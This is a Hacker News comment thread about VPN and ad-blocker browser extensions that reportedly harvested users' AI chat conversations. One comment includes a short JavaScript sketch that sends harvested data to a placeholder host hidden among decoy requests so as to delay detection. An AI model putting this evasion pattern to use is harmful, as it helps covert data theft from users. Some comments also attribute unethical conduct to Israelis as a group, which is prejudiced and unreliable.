So much of what's aimed at nontechnical consumers these days is full of dishonesty and abuse. Microsoft kinda turned Windows into something like this, you need OneDrive "for your protection", new telemetry and ads with every update, etc.
In much of the physical world thankfully there's laws and pretty-effective enforcement against people clubbing you on the head and taking your stuff, retail stores selling fake products and empty boxes, etc.
But the tech world is this ever-boiling global cauldron of intangible software processes and code - hard to get a handle on what to even regulate. Wish people would just be decent to each other, and that that would be culturally valued over materialism and moneymaking by any possible means. Perhaps it'll make a comeback.
This was a nearly poetic way to put it. Thank you for ascribing words to a problem that equally frustrates me.
I spend a lot of time trying to think of concrete ways to improve the situation, and would love to hear people's ideas. Instinctively I tend to agree it largely comes down to treating your users like human beings.
The situation won’t be improved for as long as an incentive structure exists that drives the degradation of the user experience.
Get as off-grid as you possibly can. Try to make your everyday use of technology as deterministic as possible. The free market punishes anyone who “respects their users”. Your best bet is some type of tech co-op funded partially by a billionaire who decided to be nice one day.
And still, there is plenty of software that you can't run on anything but Windows. That's a major blocker at this point and projects like 'mono' and 'wine', while extremely impressive, are still not good enough to run that same software on Linux.
I wouldn't be surprised if this was done by one of those AI companies themselves!
Remember FaceBook x Onavo?
"Facebook used a Virtual Private Network (VPN) application it acquired, called Onavo Protect, as a surveillance tool to monitor user activity on competing apps and websites"
This is exactly why we need more transparency in analytics tools. When building products that handle user data, the "free" model almost always means you're the product.
The scary part is these extensions had Google's "Featured" badge. Manual review clearly isn't enough when companies can update code post-approval. We need continuous monitoring, not just one-time vetting.
For anyone building privacy-focused tools: making your data collection transparent and your business model clear upfront is the only way to build trust. Users are getting savvier about this.
[flagged]
I would figure state actors don’t need to go through the trouble of a browser extension. But, yeah.
I'm not a spy so I don't know, but surely in most scenarios it's a lot easier to just ask someone for some data than it is to hack/steal it. 25 years of social media has shown that people really don't care about what is done with their data.
Huh? Of course they would: It's way less work than defeating TLS/SSL encryption or hacking into a bunch of different servers.
Bonus points if the government agency can leave most of the work to an ostensibly separate private company, while maintaining a "mutual understanding" of government favors for access.
Why wouldn't they? It isn't that you need to, just that obviously you would. You engage with the extension owners by sending an email from a director of a data company instead of as a captain of some military operation. The hit rate is going to be much higher with one of the strategies.
Download Valley strikes again!
How did I know this was an israeli company just by how unethical they are at scale?
Well, you'd be surprised to discover that Koi is also an Israeli company, and they were the ones who discovered this in the first place.
https://www.calcalistech.com/ctechnews/article/syoe1xjslx
It would have been no less surprising to me had it been a US company, but it certainly fits the cultural stereotype of callousness that particular country has been openly displaying in recent years.
And what are the odds that mossad are getting access to this data?
Some people have mentioned that this is a U.S.-incorporated company (Delaware). I recommend reading Moneyland by Oliver Bullough if you want to know more about the U.S. role as the new shell-company haven.
The island states have been dethroned.
Somewhat ironically, this article has significant amounts of AI writing in it. (I've done a lot of AI writing in my own sites, and have been learning how to smother "the voice". This article doesn't do a good job of smothering.)
> This means a human at Google reviewed Urban VPN Proxy and concluded it met their standards.
Or that the review happened before the code harvested all the LLM conversations and never got reviewed after it was updated.
I think this is most likely what happened. The update/review process for extensions is broken. Apparently you can add any malicious functionality after you’re in and also keep any badges and recommendations.
Why would one expect privacy with a VPN, let alone a free one? On the web, all traffic is encrypted point to point, which means individual sites could compromise your privacy, but there is no single funnel through which to lose all your data. A VPN is exactly that: all data goes through a single funnel, and they can target anything they want.
Because VPNs are exclusively and heavily marketed and sold as magical turnkey solutions to privacy, encryption, hair loss, and more!
lol, this Urban VPN addon was available for Firefox too but got removed at some point. https://old.reddit.com/r/firefox/comments/1jb4ura/what_happe...
Thanks. The last fetched page on archive.org is from 2025-01-26 [1]; it was removed after that date and before 2025-02-13. It showed 155,477 users at the time, and 1-star reviews were mostly about it not working. It's interesting that the developers didn't bother to remove the button directing to the Firefox add-on page even several months after the removal. Maybe it was some kind of PR compromise; they probably thought that a listing linking to a broken page was better than no listing at all.
A review page [2] mentions that this add-on is a peer-to-peer VPN without its own dedicated servers, which already makes it suspicious.
[1] https://web.archive.org/web/20250126133131/https://addons.mo...
[2] https://www.vpnmentor.com/reviews/urban-vpn/
Is the use of WebAssembly going to make spotting these malicious extensions harder?
Probably not. All side effects need to go through the JS side, so you can always see where HTTP calls are made.
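A rough sketch of why (module bytes and names hypothetical): WebAssembly has no I/O of its own, so the JS side decides at instantiation exactly which capabilities the module gets.

    // The import object is the wasm module's entire window to the outside world.
    const imports = {
      env: {
        // Any network access must be a JS function handed in like this one:
        send: (ptr, len) =>
          fetch("https://api.example.invalid/", { method: "POST" }),
      },
    };
    // wasmBytes: the module's bytes, e.g. bundled with the extension.
    const { instance } = await WebAssembly.instantiate(wasmBytes, imports);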
> Probably not. All side effects need to go through the JS side, so you can always see where HTTP calls are made.
That can be circumvented by bundling the conversations into one POST to an API endpoint, along with a few hundred calls to several dummy endpoints to muddy the waters. Bonus points if you can make it look like a normal update script.
It'll still show up in the end, but at this point your main goal is to delay the discovery as much as you can.
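A rough sketch of that decoy pattern (all endpoints hypothetical):

    // One real exfiltration POST buried among uniform-looking "telemetry" pings,
    // so nothing stands out in a quick skim of the network log.
    const noise = JSON.stringify({ ts: Date.now(), v: "1.4.2" });
    const harvested = JSON.stringify({ conversations: [] }); // collected data would go here
    const calls = [
      ["https://updates.example.invalid/check", noise],
      ["https://sync.example.invalid/v2/state", harvested], // the one that matters
      ["https://metrics.example.invalid/ping", noise],
    ];
    for (const [url, body] of calls) {
      fetch(url, { method: "POST", headers: { "Content-Type": "application/json" }, body });
    }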
This is a huge trust failure. A VPN or ad blocker quietly harvesting full AI conversations is the opposite of what users expect, and the fact that these extensions were featured makes it even worse. This really puts the effectiveness of browser extension reviews into question.
Why is a security researcher using a free VPN? The standard wisdom is "if it's free, you're the product". So you're going to proxy all your sensitive traffic through a free thing? It's not great to trust paid services with your data, never mind free stuff.
Sometimes knowing tech makes us think we're somehow better and can bypass high level wisdom.
They are not. They found it by searching for extensions that had the capability to exfiltrate data.
> We asked Wings, our agentic-AI risk engine, to scan for browser extensions with the capability to read and exfiltrate conversations from AI chat platforms.
Oh, a free-of-cost VPN extension that requires access to all sites and data is somehow spyware. Color me surprised.
With those extensions, the user's data and internet connection are the product; most if not all are also selling residential IP access for scrapers, bots, etc.
Good thing Google is protecting users by taking down such harmful extensions as ublock origin instead.
uBlock requires access to all sites and data. Maybe they are trustworthy, but who really knows?
Let's say we don't trust ublock. At the very least it is still blocking ad networks which do reduce internet performance and are vectors of exploitation, so it is still adding value whether you trust it or not.
I mean, I don't trust uBlock, for what it's worth. I just disable JavaScript by default, which has pretty much the same effect.
I wish Congress spent as much time fighting about issues like this as it does trying to break up Google. This would have far more impact.
Articles like this do a decent job of bringing awareness, but we all know Google will do absolutely nothing
Would using native AI apps only prevent this? I think so right?
Which "AI" has a native app?
Or you mean the web sites packed with a copy of chromium?
Correct. The article is about Chrome and MS Edge browser extensions.
Nice write up. It would be great if the authors could follow up with a detailed technical walk through of how to use the various tooling to figure out what an extension is really doing.
Could one just feed the extension and a good prompt to Claude to do this? Seems like automation CAN sniff this kind of stuff out pretty easily.
Why can't these browser extensions live in a guarded sandbox? Extensions are given full access to whatever is available on any page. I had the legacy React Developer Tools and Redux DevTools installed for years. What a great attack vector.
Am I just paranoid, or is OpenRouter the next ticking privacy time bomb? What is their business model anyway?
Note that in a model's profile on OpenRouter, under Data Policy, there is a "Prompt Training" field. Some models clearly state that prompt training is enabled, even paid ones.
>What is their business model anyway?
They take a 5.5% fee whenever you buy credits. There's also a discount for opting-in to share your prompts for training.
Do we know how much that type of content sells for? Not that I'm interested in entering the market, but the economics of that kind of thing are always fascinating. How much are buyers willing to pay for AI conversations? I would expect the value to be pretty low.
I doubt it's the actual conversations but rather the aggregated insights that are valuable.
Think: is my brand getting mentioned more in AI chats? Are people associating positive or negative feelings with it? Are more people asking about this topic lately?
Let's assume that people are discussing medical conditions in these conversations - I think that insurance companies would be pretty interested to get this kind of data in their hands.
Is this criminally prosecutable?
What would the fallout look like if too many people start to have horror stories about how much their lives were destroyed by incriminating or downright nasty or wrong AI chat history? It'll suddenly become a tool where you can't be honest. If it's not already.
This is digital assault on 8M people and should be treated that way.
> And then an uncomfortable thought: what if someone was reading all of this?
> The thought didn't let go. As a security researcher, I have the tools to answer that question.
What huh, no you don't! As a security researcher you should know better!
> Exactly the kind of tool someone installs when they want to protect themselves online.
No. When you want to increase your security, you install fewer tools.
Each tool increases your exposure. Why is the security industry full of people who don't get this?
Can someone please run all the privacy policies through an AI and tell us who else is pulling this kind of stunt?
> A "Featured" badge from Google, meaning it had passed manual review and met what Google describes as "a high standard of user experience and design."
Trusting Google with your privacy is like putting the fox in charge of the henhouse.
Wasn't the whole coercion Google did around Manifest V3 in the name of security?
How is it possible to have extensions this egregiously malicious in the new system?
"And then an uncomfortable thought: what if someone was reading all of this?"
If you really are a security researcher then that's not true. You already know all this.
If you want a VPN you can trust, deploy your own with AlgoVPN: https://github.com/trailofbits/algo
I prefer WG-Easy (https://github.com/wg-easy/wg-easy), which runs in a Docker container rather than using Ansible.
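A minimal compose sketch along the lines of the wg-easy README (image tag, environment variables and ports change between releases, so check the project's current docs before using this):

    services:
      wg-easy:
        image: ghcr.io/wg-easy/wg-easy
        environment:
          - WG_HOST=vpn.example.invalid   # placeholder: your server's public address
        volumes:
          - ./wg-easy:/etc/wireguard
        ports:
          - "51820:51820/udp"   # WireGuard tunnel
          - "51821:51821/tcp"   # web UI
        cap_add:
          - NET_ADMIN
          - SYS_MODULE
        sysctls:
          - net.ipv4.ip_forward=1
          - net.ipv4.conf.all.src_valid_mark=1
        restart: unless-stopped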
I treat extensions like they're all capable of privileged local code execution. My selection is very vetted and very small.
The only extensions I have installed are Dark Reader and uBlock Origin. It would be nice if I could disable auto-updating for them somehow and run locally pinned versions...
Get the source code and manually pack your own unsigned web-ext’s.
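Roughly, assuming the extension is a standard WebExtension and using Mozilla's web-ext tool (repo URL and tag here are placeholders):

    git clone https://example.invalid/some-extension.git
    cd some-extension
    git checkout v1.2.3    # the exact tag you audited
    npx web-ext build      # emits an unsigned .zip under ./web-ext-artifacts/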
Add-ons Manager -> (click the add-on in question) -> change "Allow automatic updates" to "Off"
(for firefox/derivatives anyways...)
Same here, uBlock Origin and EFF's Privacy Badger are the only extensions I trust enough to install.
Ditto, plus 1Password / Bitwarden.
Only those users that were stupid enough to "converse" with their chatbot.
From my experience, Google does not do a thorough app review. Reviewers get maybe a few minutes to review and move on due to the volume of apps awaiting review.
I imagine this would be a great use case for AI helping out?
I'm thinking of installing the extension in a sandbox and then using a local agent to have endless fake conversations with it.
“There’s too much human harmful code to review and too few human reviewers.”
“I know, let’s have an AI do all the work for us instead. Let’s take a coffee break.”
No way that could backfire... Prompt injection is a solved problem right?
With hardcoded flags like “sendClaudeMessages” and “sendChatgptMessages”, they weren’t even trying to hide it.
If the product is free, you are the product.
8 million users on sketchy VPN extensions.
70 thousand users on what I would actually call "privacy" extensions.
Bit of a misleading title then.
Is this the same Google that is preventing us from installing unapproved software on our phones?
If the business model isn't obvious, you are the product
> A free VPN promising privacy and security.
If you are not paying for the product, you are the product.
Can we please, please stop using this absolutely deprecated proverb? As shown by YouTube Lite, Samsung fridges with ads, cars with telemetry, etc., even if you paid, you are still subject to manipulation, spyware, ads and telemetry. It has absolutely nothing to do with payment.
The footer animation of koi.ai is so cool.
These conversations can be used to train a competing AI.
> We asked Wings, our agentic-AI risk engine
I hate to be that guy, but I am having a difficult time verifying any of this. How likely is it that this is entirely hallucinated? Can anyone independently verify this?
Pro tip: never install any browser extensions. Avoid them like the plague. I had a couple installed that were "legitimate" and I have direct evidence of them leaking/selling my browsing data. Just avoid.
There were these two people.
And um, a boy and a girl.
...
Anyway, the thing was that one day they started acting kinda funny. Kinda, weird.
They started being seen exchanging tokens of affection.
And it was rumoured they were engaging in...
Note that this is a pretty blatant GDPR violation and you should report this to the local data protection agency if you are an EU resident and care about this (especially if you've used this extension). Their privacy policy claims the data collection is consent-based and that the app settings also let you revoke this consent. According to the article, the latter isn't the case and the user is never informed of the extent of the collection and the risk of sensitive or specially protected personal information (e.g. sexual orientation) being part of the data they're collecting. Their privacy policy states the collected data is filtered to remove this kind of information, but that's irrelevant because processing necessarily happens after collection and the GDPR already applies at the start of that pipeline.
If Urban VPN is indeed closely affiliated with the data broker, a GDPR fine might also affect that company too given how these fines work. There is a high bar for the kind of misconduct that would result in a fine but it seems plausible that they're being knowingly and deliberately deceptive and engaging in widespread data collection that is intentionally invasive and covert. That would be a textbook example for the kind of behavior the GDPR is meant to target with fines.
The same likely applies to the other extensions mentioned in the article. Yes, "if the product is free, you are the product", but that is exactly why the GDPR exists. The problem isn't that they're harvesting user data but that they're being intentionally deceptive and misleading in their statements about this, claim they are using consent as the legal basis without having obtained it[0], and they're explicitly contradicting themselves in their claims ("we're not collecting sensitive information that would need special consideration but if we do we make sure to find it and remove it before sharing your information but don't worry because it's mostly used in aggregate except when it isn't"). Just because you expect some bruising when picking up martial arts as a hobby doesn't mean your sparring partner gets to pummel your face in when you're already knocked out.
[0]: Because "consent" seems to be a hard concept for some people to grasp: it's literally analogous to what you'd want to establish before having sex with someone (though to be fair: the laws are much more lenient about unclear consent for sex because it's less reasonable to expect it to be documented with a paper trail like you can easily do for software). I'll try to keep it SFW but my place of work is not your place of work so think carefully if you want to copy this into your next Powerpoint presentation.
Does your prospective sexual partner have any reason to strongly believe that they can't refuse your advances because doing so would limit their access to something else (e.g. you took them on a date in your car and they can't afford a taxi/uber and public transport isn't available so they rely on you to get back home, aka "the implication")? Then they can't give you voluntary consent because you're (intentionally or not) pressuring them into it. The same goes if you make it much harder for them to refuse than to agree (I can't think of a sex analogy for this because this seems obvious in direct human interactions but somehow some people still think hiding "reject all non-essential" is an option you are allowed to hide between two more steps when the "accept all" button is right there even if the law explicitly prohibits these shenanigans).
Is your prospective sexual partner underage or do they appear extremely naive (e.g. you suspect they've never had any sex ed and don't know what having sex might entail or the risks involved like pregnancy, STIs or, depending on the acts, potential injuries)? Then they probably can't give you informed consent because they don't fully understand what they're consenting to. For data processing this would be failure to disclose the nature of the collection/processing/storage that's about to happen. And no, throwing the entire 100-page privacy policy at them with a consent dialog at the start hardly counts, the same way throwing a biology textbook at a minor doesn't make them able to consent.
Is your prospective sexual partner giving you mixed signals but seems to be generally okay with the idea of "taking things further"? Then you're still missing specific consent and better take things one step at a time checking in on them if they're still comfortable with the direction you're taking things before you decide to raw dog their butt (even if they might turn out to be into that). Or in software terms, it's probably better to limit the things you seek consent for to what's currently happening for the user (e.g. a checkbox on a contact form that informs them what you actually intend to do with that data specifically) rather than try to get it all in one big consent modal at the start - this also comes with the advantage that you can directly demonstrate when and how the specific consent relevant to that data was obtained when later having to justify how that data was used in case something goes wrong.
Is your now-active sexual partner in a position where they can no longer tell you to stop (e.g. because they're tied up and ball-gagged)? Then the consent you did obtain isn't revokable (and thus again invalid) because they need to be able to opt out (this is what "safe words" are for and why your dentist tells you to raise your hand where they can see it if you need them to stop during a procedure - given that it's hard to talk with someone's hands in your mouth). In software this means withdrawing consent (or "opting out") should be as easy as it was to give it in the first place - an easy solution is having a "privacy settings" screen easily accessible in the same place as the privacy policy and other mandatory information that at the very least covers everything you stuffed in that consent dialog I told you not to use, as well as anything you tucked away in other forms downstream. This also gives you a nice place to link to at every opportunity to keep your user at ease and relaxed to make the journey more enjoyable for both of you.
They're probably only incorporated in the US, so it's meaningless. If they plan to establish a corp in the EU they'll just put it in Ireland and bribe Ireland like all of US big tech does. This is a solved thing.
TLDR: AI company uses AI to write blog post about abusive AI chrome extension
(Yes it really is AI-written / AI-assisted. If your AI detectors don’t go off when you read it you need to be retrained.)
ctrl-f israel: 1 result found
4*
2*
Deleted.
What sort of argument is that? Just because I need to eat (and let's be real, the developers/owners behind this app are not struggling to put food on the table) doesn't excuse doing unethical/illegal things (and this behaviour is almost certainly illegal, in the EU at least).
There is a “contradictions” section that clearly explains why this is a scam of the highest order.
There are honest ways to make a living. In this case honest is “being transparent” about the way data is handled instead of using newspeak.
The guy who holds people up for money in the alley is a human too, people forget, and he needs to pay for food and a place to live. Of course they do too.
It's ridiculous how many comments are being removed.